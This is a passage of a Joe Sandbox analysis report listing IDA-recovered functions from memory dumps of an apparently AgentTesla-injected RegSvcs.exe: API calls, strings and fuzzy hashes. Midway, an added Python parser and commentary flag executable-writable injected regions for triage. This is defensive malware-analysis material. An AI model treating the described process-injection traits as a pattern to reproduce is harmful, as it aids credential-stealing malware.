                                                      • Opcode Fuzzy Hash: 3c21b3852d4ee26529db55012a139cebc7e0dcad561be4306df920047d1b1af2
                                                      • Instruction Fuzzy Hash: 8B924474B002248FDBA4CF68C584AADBBF2FF44314F5584A9D40AAB361DB35ED85CB80
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ccf29bbb51a9f5939a2b6e647e7092b2f58ef0d7ceaf79d5acc5bf5848825bc
                                                      • Instruction ID: 091b4c43e05454aee5cfc54aa4185256916945e1f0be603e98fe996badaa8025
                                                      • Opcode Fuzzy Hash: 5ccf29bbb51a9f5939a2b6e647e7092b2f58ef0d7ceaf79d5acc5bf5848825bc
                                                      • Instruction Fuzzy Hash: 7462AF74B002259FDB54DF68D554AADB7F2EF88310F1084A9E806EB350EB39ED46CB81
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf1b7474e2fa19e767f8e38a7e2199669891a60a77dc9f57e37e6dbec8d3942b
                                                      • Instruction ID: b5331f9df2c55e811e579dc0f59ac980acdbcd1d18d951b307d97b9614ddd8fa
                                                      • Opcode Fuzzy Hash: bf1b7474e2fa19e767f8e38a7e2199669891a60a77dc9f57e37e6dbec8d3942b
                                                      • Instruction Fuzzy Hash: E6329F74F002159FDB54DFA8D980AAEBBB2FB88310F109565D905EB395DB38EC42CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6333463995628dfd8d0f44a07d7fb1f1c24794c1ddc787ae88676ce131888435
                                                      • Instruction ID: c1930e3774a12e055773e62d1c4e2c3becc36cd4aeff7b0677dde6964b16c12f
                                                      • Opcode Fuzzy Hash: 6333463995628dfd8d0f44a07d7fb1f1c24794c1ddc787ae88676ce131888435
                                                      • Instruction Fuzzy Hash: 0312E3B2F002259BDB74CF64D88066EB7B2FB85314F2485A9D85ADB341CB34ED42CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 356974bc28a37cee73a50912a7f198df336aae83e09eae8450b552fb2beee386
                                                      • Instruction ID: 67505b2d13d7de801f0bb99fb1ebf901a35906952b766f4b5ddcc396cebbaea8
                                                      • Opcode Fuzzy Hash: 356974bc28a37cee73a50912a7f198df336aae83e09eae8450b552fb2beee386
                                                      • Instruction Fuzzy Hash: 29228FB0F002199FDF64CE68D5907ADB7B5FB59310F209966E409EB399CA38DC81CB51
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2f77901b19a3f225cea42a9c66331f76d5067276b4284233c01ee655f3c8680
                                                      • Instruction ID: a818e891ebbb89f12ed2d4ffef72fe00bbc3ea2d272540d6b93abf8dc1e0bc35
                                                      • Opcode Fuzzy Hash: c2f77901b19a3f225cea42a9c66331f76d5067276b4284233c01ee655f3c8680
                                                      • Instruction Fuzzy Hash: F7B16170E402098FDF10CFA8C8A17DDBBF2AF89318F14D529D419EB294EB74A845CB91

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-1273862796
                                                      • Opcode ID: cb462bc1237ad29ed1729ee4d1ae955f1c792a2823a6dfcb340e2a05cd9d1de4
                                                      • Instruction ID: 266b693808e8344b10f81d8cea8e31f0125cb70fa90d40b1102529dd7dfc6254
                                                      • Opcode Fuzzy Hash: cb462bc1237ad29ed1729ee4d1ae955f1c792a2823a6dfcb340e2a05cd9d1de4
                                                      • Instruction Fuzzy Hash: CEE16F70F102198FCB69DF68D5906AEB7B6EF84300F208569D849EB354DB38EC46CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-3723351465
                                                      • Opcode ID: 7e59927dada83317d1cf98cf751330ec0aceec3e8b1bf1b2a56766dbfaef6d8a
                                                      • Instruction ID: 0f68fc1c2fdb069d28b5608fe787ef7ddc6f238366d49c759028b7bf0d97dbde
                                                      • Opcode Fuzzy Hash: 7e59927dada83317d1cf98cf751330ec0aceec3e8b1bf1b2a56766dbfaef6d8a
                                                      • Instruction Fuzzy Hash: 4002BEB0F0022A9FDB64CF68D590AADB7B1FF95300F1099AAD409DB259DB34ED45CB81

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q
                                                      • API String ID: 0-858218434
                                                      • Opcode ID: 6992436791a0e9251ebe2e27c8aed44b532324089349956f0101aa25eda16a25
                                                      • Instruction ID: 5043330ee61cd75a1eca03abc341e2bc78611ab02aa97ed8cafe7a46c38184b0
                                                      • Opcode Fuzzy Hash: 6992436791a0e9251ebe2e27c8aed44b532324089349956f0101aa25eda16a25
                                                      • Instruction Fuzzy Hash: 7E915070F0061A9FDB54DF69D950BAEB3F6FF84204F108565C809EB384EAB4DD468B92

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q
                                                      • API String ID: 0-182748909
                                                      • Opcode ID: 03e739c815d7820f9497735250e9fcf1ae65a06956d4a9f91a9ac982659163d0
                                                      • Instruction ID: 7a28ba178e1588a8842d2855d6083a2c587c9fbc526acd80218af0532563b028
                                                      • Opcode Fuzzy Hash: 03e739c815d7820f9497735250e9fcf1ae65a06956d4a9f91a9ac982659163d0
                                                      • Instruction Fuzzy Hash: A8628F7470021A8FCB55EF68D690A5EB7B6FF84304B208A78D4059F359DB78ED4ACB81

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fbq$XPbq$\Obq
                                                      • API String ID: 0-4057264190
                                                      • Opcode ID: 0a37ad280ae0f6494e893fb56955fe99c4e32cc2140d6d314d7dd095ebc6dd2a
                                                      • Instruction ID: b7c84f2ab4162484edafffd3c46f9c980186f700172ba5f75f1aadc412e52101
                                                      • Opcode Fuzzy Hash: 0a37ad280ae0f6494e893fb56955fe99c4e32cc2140d6d314d7dd095ebc6dd2a
                                                      • Instruction Fuzzy Hash: 8E619F70F002199FEB549FA8C8547AEBBF6FF88700F208429D50AEB390DB798D458B51

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q
                                                      • API String ID: 0-127220927
                                                      • Opcode ID: 08404ed52aa3dd705f3024ac18dcc0d3012832022f709a2176d6bc7f9af0035d
                                                      • Instruction ID: 977d48a7854a5ef510e6241ba16d1f7885f369f521f2f44f7db45a42e192007b
                                                      • Opcode Fuzzy Hash: 08404ed52aa3dd705f3024ac18dcc0d3012832022f709a2176d6bc7f9af0035d
                                                      • Instruction Fuzzy Hash: BD516E70B005169FDB54DF78D950B6EB3F6EB88204F108469C809EB394EAB9DC468B92

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fbq$XPbq
                                                      • API String ID: 0-2292610095
                                                      • Opcode ID: 239912a55386a83b668a18ec1a9b3fa636e78caafe4d34520d071a69e5290904
                                                      • Instruction ID: eae0df53c217778f92b2ed3c0fc9fc2382510f8fbd3f2b47f3d5e2fd186babce
                                                      • Opcode Fuzzy Hash: 239912a55386a83b668a18ec1a9b3fa636e78caafe4d34520d071a69e5290904
                                                      • Instruction Fuzzy Hash: D3519E70F002199FDB549FA9C854BAEBBF6FF88700F208529D506EB394DB798C458B91
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06B2D622
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 6373d30129418f8a984e0b4883c49f846a99446ea9dfc7669b010f23aa6c55ae
                                                      • Instruction ID: da8ce6a59daa090b0f6f6f10d579fb467b7d22a9f19ed2c5efe11272f83a5189
                                                      • Opcode Fuzzy Hash: 6373d30129418f8a984e0b4883c49f846a99446ea9dfc7669b010f23aa6c55ae
                                                      • Instruction Fuzzy Hash: E151CEB1D003199FDB14CF9AC884ADEBBF5FF48310F24856AE818AB210D775A885CF90
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06B2D622
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 7d1f73032b8711183043935bdb26d4bda1a758f9ae7428d18a41ec49e85ee562
                                                      • Instruction ID: 3c3e0549da84299048acd73b6d3e480752f98ab0e22515511c94b8dfae715b5e
                                                      • Opcode Fuzzy Hash: 7d1f73032b8711183043935bdb26d4bda1a758f9ae7428d18a41ec49e85ee562
                                                      • Instruction Fuzzy Hash: B541BEB1D003599FDB14CF9AD884ADEBBF5FF48310F24856AE818AB250D775A885CF90
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 06B2FD11
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: a82fac86ba74a6a51bad2f7842eb1f936ef00f60536f837d764118f059a656d3
                                                      • Instruction ID: 9bd92732fe66dbc300fdcf8e3a3379156e713ee967aab1f1245c1cd1e107b940
                                                      • Opcode Fuzzy Hash: a82fac86ba74a6a51bad2f7842eb1f936ef00f60536f837d764118f059a656d3
                                                      • Instruction Fuzzy Hash: 37416DB4900315CFDB54CF99C448AAABBF9FF88710F24C499D519A7321C774A841CFA0
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06B23016,?,?,?,?,?), ref: 06B230D7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 6d3607c915abe4ae5e205f637bb0f10a3d1e6072a2cab297cc90e21f7f7bf56a
                                                      • Instruction ID: a0a2ac0c634d3802ae96ad2d6bbf79043da6d3cb6f7b00a4658625a864c42d1f
                                                      • Opcode Fuzzy Hash: 6d3607c915abe4ae5e205f637bb0f10a3d1e6072a2cab297cc90e21f7f7bf56a
                                                      • Instruction Fuzzy Hash: D821E3B5D002199FDB10CF9AD984AEEBBF8FB48310F14845AE918A7350D379A944CFA4
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06B23016,?,?,?,?,?), ref: 06B230D7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: e0c9796356c6745adf1213de23c6b9b77186af27f1a46a37731141fd9f29f125
                                                      • Instruction ID: f0e04a5ea8cf05bd866ac8e9a45fd385cd8f6e8f08b294bb28710644d041ad0b
                                                      • Opcode Fuzzy Hash: e0c9796356c6745adf1213de23c6b9b77186af27f1a46a37731141fd9f29f125
                                                      • Instruction Fuzzy Hash: BF2114B5D00218DFDB10CF9AD884AEEBBF5FB48310F14801AE918A7310D378A940CFA0
                                                      APIs
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 02EAEC5F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus
                                                      • String ID:
                                                      • API String ID: 1890195054-0
                                                      • Opcode ID: 07be544a36cfc223ed581de313e7819b41ec7fb5b1ba04bd554a214dfe59c936
                                                      • Instruction ID: 80f398cb187c4de3c5324a8d7d87353fe33ac3f84da533d016c0317d353cfa66
                                                      • Opcode Fuzzy Hash: 07be544a36cfc223ed581de313e7819b41ec7fb5b1ba04bd554a214dfe59c936
                                                      • Instruction Fuzzy Hash: 501103B1D006599BCB10DF9AC544ADEFBF4BF48720F14816AE818A7250D378A944CFA5
                                                      APIs
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 02EAEC5F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus
                                                      • String ID:
                                                      • API String ID: 1890195054-0
                                                      • Opcode ID: a0263d819379ba3c8c13d28ebbeb30c9e08be72a7edd3bf72ebec1316d48e442
                                                      • Instruction ID: 9629cab0aa7e11d50237e911ff4838b79f46d3f636400ce391a7abf8256fd99a
                                                      • Opcode Fuzzy Hash: a0263d819379ba3c8c13d28ebbeb30c9e08be72a7edd3bf72ebec1316d48e442
                                                      • Instruction Fuzzy Hash: CB11EFB1C006599BCB10DFAAC548ADEFBF4AF48724F14816AD818A7240D778A944CFA5
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06B2B344), ref: 06B2B57E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 240ff0d261b9d4a1d1a7fb9bcf0e90e30691e0f6746890a7e3cdccd6ef73dcb3
                                                      • Instruction ID: 8eca8cc02602421e31e2d5a1f352592eb779d7abae841c382ebec77c5e19db71
                                                      • Opcode Fuzzy Hash: 240ff0d261b9d4a1d1a7fb9bcf0e90e30691e0f6746890a7e3cdccd6ef73dcb3
                                                      • Instruction Fuzzy Hash: D61132B1C003198FDB20DF9AC444A9EFBF4EF48314F14845AD519A7210D378A545CFA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH]q
                                                      • API String ID: 0-3168235125
                                                      • Opcode ID: 37e3fb81e3526b5bdc29e9f44230569e0d433fd3b75c18ca5e8170d771163a0c
                                                      • Instruction ID: a49d4cfffecb831de5dad512d6176dc6dd6dba934b73617106d26166b4ce54ac
                                                      • Opcode Fuzzy Hash: 37e3fb81e3526b5bdc29e9f44230569e0d433fd3b75c18ca5e8170d771163a0c
                                                      • Instruction Fuzzy Hash: 4A41A0B4F1031A9FDB65DF64D45079EBBB2EF85300F104969E806EB240EB74D946CB81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH]q
                                                      • API String ID: 0-3168235125
                                                      • Opcode ID: afa9a5f6b0bdc9e02192a4dcf2693bc8ed9d073ede874eff91a0f32e69d9b960
                                                      • Instruction ID: 4ea2066ca5a1e6d2e57c10df76575450f91a8a7b1d2f09588f3cbcfc97e29643
                                                      • Opcode Fuzzy Hash: afa9a5f6b0bdc9e02192a4dcf2693bc8ed9d073ede874eff91a0f32e69d9b960
                                                      • Instruction Fuzzy Hash: 2931F270B102158FDB699B78D9506AF77A6FF88200F204478D806DB384DF39CE46CB95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q
                                                      • API String ID: 0-1007455737
                                                      • Opcode ID: 244f1e6b8db45788111b217d217ba7b89082c60411b899edb195b2876c70dde7
                                                      • Instruction ID: 0410fd9029f28fd7d38b20e6dd8404cc03f2d42cdb7901b2b6f6e8fa09a66f4a
                                                      • Opcode Fuzzy Hash: 244f1e6b8db45788111b217d217ba7b89082c60411b899edb195b2876c70dde7
                                                      • Instruction Fuzzy Hash: B6F0DCB5B002208FDF748E58EA8166873A4EB80300F0404B5F806DB341C639DD02C783
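The records above are the output of the Joe Sandbox IDA plugin: one block per function recovered from a memory dump of the RegSvcs process (pid 8), listing the API references and strings the function uses, the dump it came from, and two fuzzy hashes (opcode and instruction) meant for cross-sample similarity. The Python below is an added example, not Joe Sandbox's own tooling and not part of the report: it parses those blocks once the page is saved as text and summarises, per dumped region, whether the region was PAGE_EXECUTE_READWRITE (0x40) and which APIs and strings the code there references. It assumes the .sdmp file name is laid out as <pid>.<dump>.<timestamp>.<base>.<protect>..., with the pid in decimal and base/protection in hex, and runs on a constructed sample of three records abridged from this section.

```python
"""Parse Joe Sandbox 'Executed Functions' records (as extracted to text) and
summarise, per dumped region, which APIs the recovered code references.
Added example, not Joe Sandbox's own tooling; assumptions are marked below."""
import re
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40   # Windows memory-protection constant (winnt.h)
# Assumption: .sdmp name = <pid>.<dump#>.<timestamp>.<base>.<protect>.<...>
# with the pid in decimal and base/protect in hex; only those fields are used.
SDMP_NAME = re.compile(r"(?P<pid>\d{8})\.[0-9A-Fa-f]{8}\.\d+\."
                       r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.")
BULLET = re.compile(r"^•\s*(?P<body>.*)$")
FIELD = re.compile(r"^(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
API_REF = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)(?:\(.*\))?,?\s+ref:\s*(?P<addr>[0-9A-Fa-f]+)")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class FunctionRecord:
    pid: int = 0
    base: int = 0
    protect: int = 0
    apis: list = field(default_factory=list)      # (api, module, call-site address)
    strings: list = field(default_factory=list)
    opcode_hash: str = ""
    instruction_hash: str = ""

def parse_records(text: str) -> list:
    """One FunctionRecord per block; 'Instruction Fuzzy Hash' closes a block."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()                         # the page is heavily indented
        if line in SECTIONS:
            section = line
            continue
        m = BULLET.match(line)
        if not m:
            continue
        body = m["body"]
        if section == "APIs" and (a := API_REF.match(body)):
            cur.apis.append((a["api"], a["module"], int(a["addr"], 16)))
            continue
        f = FIELD.match(body)
        if not f:
            continue
        key, val = f["key"], f["val"].strip()
        if key == "Source File" and (s := SDMP_NAME.search(val)):
            cur.pid, cur.base, cur.protect = int(s["pid"]), int(s["base"], 16), int(s["protect"], 16)
        elif key == "String ID" and val:
            cur.strings.append(val)
        elif key == "Opcode Fuzzy Hash":
            cur.opcode_hash = val
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_hash = val
            records.append(cur)                   # last field of a block: flush it
            cur, section = FunctionRecord(), None
    return records

def summarize_regions(records) -> dict:
    """(pid, base) -> {'rwx', 'functions', 'apis', 'strings'} for quick triage."""
    out = {}
    for r in records:
        e = out.setdefault((r.pid, r.base), {"rwx": r.protect == PAGE_EXECUTE_READWRITE,
                                             "functions": 0, "apis": set(), "strings": set()})
        e["functions"] += 1
        e["apis"].update(api for api, _, _ in r.apis)
        e["strings"].update(r.strings)
    return out

# Constructed sample: three records copied from this section, abridged to the
# fields the parser reads (bullets are the page's own '•').
SAMPLE = """\
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 02EAEC5F
Memory Dump Source
• Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
• String ID:
• Opcode Fuzzy Hash: 07be544a36cfc223ed581de313e7819b41ec7fb5b1ba04bd554a214dfe59c936
• Instruction Fuzzy Hash: 501103B1D006599BCB10DF9AC544ADEFBF4BF48720F14816AE818A7250D378A944CFA5
APIs
• GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06B2B344), ref: 06B2B57E
Memory Dump Source
• Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
• String ID:
• Opcode Fuzzy Hash: 240ff0d261b9d4a1d1a7fb9bcf0e90e30691e0f6746890a7e3cdccd6ef73dcb3
• Instruction Fuzzy Hash: D61132B1C003198FDB20DF9AC444A9EFBF4EF48314F14845AD519A7210D378A545CFA4
Strings
Memory Dump Source
• Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
• String ID: PH]q
• Opcode Fuzzy Hash: 37e3fb81e3526b5bdc29e9f44230569e0d433fd3b75c18ca5e8170d771163a0c
• Instruction Fuzzy Hash: 4A41A0B4F1031A9FDB65DF64D45079EBBB2EF85300F104969E806EB240EB74D946CB81
"""

if __name__ == "__main__":
    for (pid, base), e in sorted(summarize_regions(parse_records(SAMPLE)).items()):
        print(f"pid {pid} base {base:08X} rwx={e['rwx']} functions={e['functions']} "
              f"apis={sorted(e['apis'])} strings={sorted(e['strings'])}")
```

Run against the full saved section, the summary gives one row per dumped region of RegSvcs.exe. For the three sampled regions (02EA0000, 06B20000, 06B30000) the protection field is 0x40, i.e. executable and writable memory in a process that did not start with code there, which is the condition behind the report's "Writes to foreign memory regions" and "Injects a PE file into a foreign processes" signatures; the GlobalMemoryStatusEx and GetModuleHandleW call sites are recovered with their addresses, and the opcode and instruction fuzzy hashes are carried through so they can be compared with the same fields in other AgentTesla reports.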
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31b35c10218e7c868ed0d0631f3a440bb6494f12667980c73dca5c59a1b806a2
                                                      • Instruction ID: 8b14966044e55c73eda9bd3589880e4171c43e32f0b7f3968eabe5b5c3ff5986
                                                      • Opcode Fuzzy Hash: 31b35c10218e7c868ed0d0631f3a440bb6494f12667980c73dca5c59a1b806a2
                                                      • Instruction Fuzzy Hash: D461A0B1F001214FDB54AA6EC880A5FBADBEFD4220B154479D80EDB364EE79DD0287D2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43126cee3cb432d43013cac2f3154073cef710f087b9497bf56f248ce7ca42bc
                                                      • Instruction ID: 1b2bb27251d0b5671e1e71401aeff2f166860362b341789f0eb342f46a4cceab
                                                      • Opcode Fuzzy Hash: 43126cee3cb432d43013cac2f3154073cef710f087b9497bf56f248ce7ca42bc
                                                      • Instruction Fuzzy Hash: DC817C70B0021A9FDB94DFA8D45469EB7F2EF89304F108478D40AEB395EB34DC468B92
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9bffd1a08d0a8c77acaa80e432b9b5c189e2688c2981a7b7b9ecd173d8d90906
                                                      • Instruction ID: 20798b9243ba2e321f76be7740e2620f3bd4de08920c83eb6e911739de6b2042
                                                      • Opcode Fuzzy Hash: 9bffd1a08d0a8c77acaa80e432b9b5c189e2688c2981a7b7b9ecd173d8d90906
                                                      • Instruction Fuzzy Hash: 7D915D70E102198FDF60DF68C890B9DB7B1FF89300F208699D549AB295DB74AE85CF91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
